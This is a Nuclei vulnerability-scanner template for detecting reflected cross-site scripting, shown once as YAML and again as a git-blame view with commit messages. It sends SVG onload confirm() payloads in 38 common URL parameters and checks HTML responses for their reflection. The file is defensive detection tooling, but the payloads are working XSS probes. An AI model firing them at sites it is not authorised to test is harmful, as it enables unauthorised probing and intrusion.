nuclei-templates/vulnerabilities/generic/top-xss-params.yaml

id: top-xss-params

info:
  name: Top 38 Parameters - Cross-Site Scripting
  author: foulenzer,geeknik
  severity: high
  description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
  metadata:
    parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,generic

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E"
      - "{{BaseURL}}/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E"
      - "{{BaseURL}}/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E"

    host-redirects: true
    max-redirects: 1
    matchers-condition: and
    matchers:
      - type: word
        part: body
        condition: or
        words:
          - "'>\"<svg/onload=confirm('q')>"
          - "'>\"<svg/onload=confirm('s')>"
          - "'>\"<svg/onload=confirm('search')>"
          - "'>\"<svg/onload=confirm('id')>"
          - "'>\"<svg/onload=confirm('action')>"
          - "'>\"<svg/onload=confirm('keyword')>"
          - "'>\"<svg/onload=confirm('query')>"
          - "'>\"<svg/onload=confirm('page')>"
          - "'>\"<svg/onload=confirm('keywords')>"
          - "'>\"<svg/onload=confirm('url')>"
          - "'>\"<svg/onload=confirm('view')>"
          - "'>\"<svg/onload=confirm('cat')>"
          - "'>\"<svg/onload=confirm('name')>"
          - "'>\"<svg/onload=confirm('key')>"
          - "'>\"<svg/onload=confirm('p')>"
          - "'>\"<svg/onload=confirm('month')>"
          - "'>\"<svg/onload=confirm('page_id')>"
          - "'>\"<svg/onload=confirm('password')>"
          - "'>\"<svg/onload=confirm('terms')>"
          - "'>\"<svg/onload=confirm('token')>"
          - "'>\"<svg/onload=confirm('type')>"
          - "'>\"<svg/onload=confirm('unsubscribe_token')>"
          - "'>\"<svg/onload=confirm('api')>"
          - "'>\"<svg/onload=confirm('api_key')>"
          - "'>\"<svg/onload=confirm('begindate')>"
          - "'>\"<svg/onload=confirm('callback')>"
          - "'>\"<svg/onload=confirm('categoryid')>"
          - "'>\"<svg/onload=confirm('csrf_token')>"
          - "'>\"<svg/onload=confirm('email')>"
          - "'>\"<svg/onload=confirm('emailto')>"
          - "'>\"<svg/onload=confirm('enddate')>"
          - "'>\"<svg/onload=confirm('immagine')>"
          - "'>\"<svg/onload=confirm('item')>"
          - "'>\"<svg/onload=confirm('jsonp')>"
          - "'>\"<svg/onload=confirm('l')>"
          - "'>\"<svg/onload=confirm('lang')>"
          - "'>\"<svg/onload=confirm('list_type')>"
          - "'>\"<svg/onload=confirm('year')>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        condition: or
        negative: true
        words:
          - "<title>Access Denied</title>"
          - "You don't have permission to access"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
moving more files around 2021-01-09 13:02:04 +00:00			`id: top-xss-params`
updating templates 2020-08-15 08:48:23 +00:00
			`info:`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`name: Top 38 Parameters - Cross-Site Scripting`
Updated author names 2021-06-09 12:20:56 +00:00			`author: foulenzer,geeknik`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`severity: high`
			`description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.`
Metadata attribute update 2021-09-16 15:54:33 +00:00			`metadata:`
Update top-xss-params.yaml added an additional 23 parameters and matchers 2021-10-30 21:26:28 +00:00			`parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`
			`cvss-score: 7.2`
			`cwe-id: CWE-79`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: xss,generic`
updating templates 2020-08-15 08:48:23 +00:00
			`requests:`
			`- method: GET`
			`path:`
Added complete payload and matcher 2021-05-07 09:51:59 +00:00			- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E"
Update top-xss-params.yaml added an additional 23 parameters and matchers 2021-10-30 21:26:28 +00:00			- "{{BaseURL}}/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E"
			- "{{BaseURL}}/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E"
tags improvements 2021-04-06 08:15:46 +00:00
Using "host-redirects" instead of "redirects" to avoid scanning 3rd party / out of scope hosts. (#5491) 2022-10-07 21:27:25 +00:00			`host-redirects: true`
Update top-15-xss.yaml Fine tuning the template. Sometimes a host will redirect the original request to another page or subdomain and the XSS happens on that page instead of with the original request. I believe a max-redirects of 1 should be sufficient. 2020-11-03 18:00:38 +00:00			`max-redirects: 1`
Update top-15-xss.yaml spaces again. 2020-09-04 07:49:39 +00:00			`matchers-condition: and`
updating templates 2020-08-15 08:48:23 +00:00			`matchers:`
			`- type: word`
misc update 2021-10-31 10:54:36 +00:00			`part: body`
			`condition: or`
updating templates 2020-08-15 08:48:23 +00:00			`words:`
Update top-xss-params.yaml Fix more false positives. 2021-05-10 18:39:09 +00:00			`- "'>\"<svg/onload=confirm('q')>"`
			`- "'>\"<svg/onload=confirm('s')>"`
			`- "'>\"<svg/onload=confirm('search')>"`
			`- "'>\"<svg/onload=confirm('id')>"`
			`- "'>\"<svg/onload=confirm('action')>"`
			`- "'>\"<svg/onload=confirm('keyword')>"`
			`- "'>\"<svg/onload=confirm('query')>"`
			`- "'>\"<svg/onload=confirm('page')>"`
			`- "'>\"<svg/onload=confirm('keywords')>"`
			`- "'>\"<svg/onload=confirm('url')>"`
			`- "'>\"<svg/onload=confirm('view')>"`
			`- "'>\"<svg/onload=confirm('cat')>"`
			`- "'>\"<svg/onload=confirm('name')>"`
			`- "'>\"<svg/onload=confirm('key')>"`
			`- "'>\"<svg/onload=confirm('p')>"`
Update top-xss-params.yaml added an additional 23 parameters and matchers 2021-10-30 21:26:28 +00:00			`- "'>\"<svg/onload=confirm('month')>"`
			`- "'>\"<svg/onload=confirm('page_id')>"`
			`- "'>\"<svg/onload=confirm('password')>"`
			`- "'>\"<svg/onload=confirm('terms')>"`
			`- "'>\"<svg/onload=confirm('token')>"`
			`- "'>\"<svg/onload=confirm('type')>"`
			`- "'>\"<svg/onload=confirm('unsubscribe_token')>"`
			`- "'>\"<svg/onload=confirm('api')>"`
			`- "'>\"<svg/onload=confirm('api_key')>"`
			`- "'>\"<svg/onload=confirm('begindate')>"`
			`- "'>\"<svg/onload=confirm('callback')>"`
			`- "'>\"<svg/onload=confirm('categoryid')>"`
			`- "'>\"<svg/onload=confirm('csrf_token')>"`
			`- "'>\"<svg/onload=confirm('email')>"`
			`- "'>\"<svg/onload=confirm('emailto')>"`
			`- "'>\"<svg/onload=confirm('enddate')>"`
			`- "'>\"<svg/onload=confirm('immagine')>"`
			`- "'>\"<svg/onload=confirm('item')>"`
			`- "'>\"<svg/onload=confirm('jsonp')>"`
			`- "'>\"<svg/onload=confirm('l')>"`
			`- "'>\"<svg/onload=confirm('lang')>"`
			`- "'>\"<svg/onload=confirm('list_type')>"`
			`- "'>\"<svg/onload=confirm('year')>"`
Update top-15-xss.yaml 2020-11-26 17:59:40 +00:00
Update top-15-xss.yaml 2020-09-04 07:46:30 +00:00			`- type: word`
misc update 2021-10-31 10:54:36 +00:00			`part: header`
Update top-15-xss.yaml 2020-09-04 07:46:30 +00:00			`words:`
matcher update 2020-12-02 04:31:03 +00:00			`- "text/html"`
matcher updates 2021-01-11 06:44:22 +00:00
Update top-xss-params.yaml Fixes an edge case false positive on AkamaiGhost servers 2021-05-10 18:20:48 +00:00			`- type: word`
misc update 2021-10-31 10:54:36 +00:00			`part: body`
			`condition: or`
			`negative: true`
Update top-xss-params.yaml Fixes an edge case false positive on AkamaiGhost servers 2021-05-10 18:20:48 +00:00			`words:`
			`- "<title>Access Denied</title>"`
			`- "You don't have permission to access"`

matcher updates 2021-01-11 06:44:22 +00:00			`- type: status`
			`status:`
Update top-xss-params.yaml 2021-05-06 12:55:40 +00:00			`- 200`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00
			`# Enhanced by mp on 2022/09/23`